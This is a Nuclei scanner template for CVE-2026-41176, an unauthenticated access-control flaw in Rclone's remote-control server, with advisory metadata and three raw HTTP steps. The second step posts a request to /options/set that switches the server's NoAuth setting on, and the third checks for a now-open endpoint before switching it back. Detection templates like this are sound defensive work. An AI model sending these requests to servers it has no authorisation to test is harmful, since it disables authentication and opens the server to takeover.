id: CVE-2026-41176

info:
  name: Rclone RC - Broken Access Control
  author: theamanrawat
  severity: critical
  description: |
    Rclone >= 1.45.0 and < 1.73.5 contains a broken access control vulnerability caused by unauthenticated access to the RC endpoint `options/set`, which allows mutation of the global runtime configuration and lets unauthenticated attackers reach sensitive administrative functions. Exploitation requires the RC server to have been started without global HTTP authentication.
  impact: |
    Unauthenticated attackers can access sensitive administrative functions, potentially leading to full control over the RC server configuration and operations.
  remediation: |
    Upgrade to version 1.73.5 or later.
  reference:
    - https://github.com/rclone/rclone/security/advisories/GHSA-25qr-6mpr-f7qx
    - https://nvd.nist.gov/vuln/detail/CVE-2026-41176
  classification:
    cvss-score: 9.2
    cve-id: CVE-2026-41176
    epss-score: 0.26321
    epss-percentile: 0.96407
    cwe-id: CWE-306
  metadata:
    verified: true
    max-request: 4
    vendor: rclone
    product: rclone
  tags: cve,cve2026,rclone,auth-bypass,rce,unauth,vkev

flow: http(1) && http(2) && http(3)

http:
  # Step 1: confirm the RC server rejects unauthenticated access to a
  # privileged endpoint (expected 403 before the configuration change).
  - raw:
      - |
        POST /config/listremotes HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 403'
          - 'contains(content_type, "application/json")'
        condition: and
        internal: true

  # Step 2: options/set is reachable without authentication and accepts a
  # change to the rc.NoAuth runtime option (expected 200 with an empty JSON body).
  - raw:
      - |
        POST /options/set HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"rc":{"NoAuth":true}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{}")'
          - 'contains(content_type, "application/json")'
        condition: and
        internal: true

  # Step 3: the previously forbidden endpoint now answers 200, proving the
  # access control bypass; the second request restores the original setting.
  - raw:
      - |
        POST /config/listremotes HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

      - |
        POST /options/set HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"rc":{"NoAuth":false}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "remotes")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4a0a00473045022041279b9f726b6124770a1e1c8122ee5e0c138232f75f0b2ea8dfbff7067c0370022100d4e222820e0899140a945cd9f5d14a1fdfddb3fa8f82de240cf901ef058cb078:922c64590222798bb761d5b6d8e72950